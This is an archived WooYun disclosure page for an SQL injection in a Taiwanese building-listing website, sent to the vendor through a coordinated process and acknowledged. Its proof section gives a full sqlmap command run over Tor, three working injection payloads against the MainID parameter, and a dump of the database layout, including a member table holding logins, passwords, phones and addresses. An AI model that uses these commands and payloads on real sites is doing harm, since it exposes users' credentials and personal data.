当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0159702

漏洞标题:台湾優築網SQL注入(影响一千多用户)(臺灣地區)

相关厂商:台湾優築網

漏洞作者: 路人甲

提交时间:2015-12-10 15:47

修复时间:2016-01-28 17:39

公开时间:2016-01-28 17:39

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-10: 细节已通知厂商并且等待厂商处理中
2015-12-14: 厂商已经确认,细节仅向厂商公开
2015-12-24: 细节向核心白帽子及相关领域专家公开
2016-01-03: 细节向普通白帽子公开
2016-01-13: 细节向实习白帽子公开
2016-01-28: 细节向公众公开

简要描述:

台湾優築網SQL注入

详细说明:

台湾優築網SQL注入

漏洞证明:

$ ./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --time-sec=20 --technique=BEUS --union-char=N -u "**.**.**.**/01_case/01_case_00_overview.php?MainID=1" --dbs --is-dba --current-db
Parameter: MainID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: MainID=1' AND 7235=7235 AND 'SUmO'='SUmO
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: MainID=1' AND (SELECT 1443 FROM(SELECT COUNT(*),CONCAT(0x716b7a6271,(SELECT (ELT(1443=1443,1))),0x7176707a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'DEGx'='DEGx
Type: UNION query
Title: Generic UNION query (N) - 11 columns
Payload: MainID=1' UNION ALL SELECT 'N',CONCAT(0x716b7a6271,0x7361694776426169584f,0x7176707a71),'N','N','N','N','N','N','N','N','N'--
web application technology: Apache
back-end DBMS: MySQL 5.0
current database: 'vhost71706'
current user is DBA: False
Database: vhost71706
+------------------------+---------+
| Table | Entries |
+------------------------+---------+
| p_impeach_tb | 11628 |
| c_news | 9750 |
| c_build_img | 7646 |
| tb_sys_history | 5711 |
| c_news_b | 5077 |
| c_build_cdr | 4804 |
| c_build_tb | 3773 |
| hat_area | 3144 |
| c_build_sp | 1579 |
| c_member_tb | 1262 | =====> 1千多用户
| c_contact | 935 |
| c_build_img_dir | 904 |
| c_build_direction_item | 843 |
| c_store_tb | 781 |
| p_city_tb | 389 |
| sys_city_tb | 387 |
| hat_city | 345 |
| p_fav_tb | 333 |
| c_build_question | 300 |
| unju_creation | 275 |
| role1 | 251 |
| c_forum_tb | 241 |
| m_cms | 239 |
| c_build_img_date | 237 |
| c_link | 103 |
| city_sory_detail | 99 |
<....>
Database: vhost71706
Table: c_member_tb
[46 columns]
+------------+---------------------+
| Column | Type |
+------------+---------------------+
| mid | bigint(10) unsigned |
| zaddress1 | text | ==>地址
| zboss | varchar(50) |
| zchild | varchar(20) |
| zcity1 | varchar(20) |
| zcompany | text |
| zdate | datetime |
| zday | char(2) |
| zeditdate | datetime |
| zepaper | varchar(5) |
| zfirstname | text |
| zid | varchar(20) |
| zjob | bigint(5) |
| zjob2 | bigint(5) |
| zjobname | varchar(20) |
| zlink | text |
| zloginid | text | ==>用户
| zlv | bigint(10) |
| zmail | varchar(100) |
| zmarry | varchar(20) |
| zmoney | varchar(20) |
| zmonth | char(2) |
| zmsn | text |
| zname | text |
| zorder | bigint(20) |
| zpassa | varchar(50) |
| zpassq | varchar(20) |
| zpasswd | text | ==>密码
| zpic | varchar(50) |
| zpicsize | text |
| zprevid | bigint(10) |
| zschool | varchar(20) |
| zsex | varchar(20) |
| zsex2 | varchar(5) |
| zskype | text |
| zstate | varchar(5) |
| ztel | varchar(10) | ==> 电话
| ztel2 | varchar(20) |
| ztel3 | text |
| ztel4 | text |
| ztel5 | text |
| ztel6 | text |
| ztitle | varchar(200) |
| zuserid | text |
| zyear | varchar(4) |
| zzone1 | varchar(10) |
+------------+---------------------+

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-12-14 22:59

厂商回复:

感謝通報

最新状态:

暂无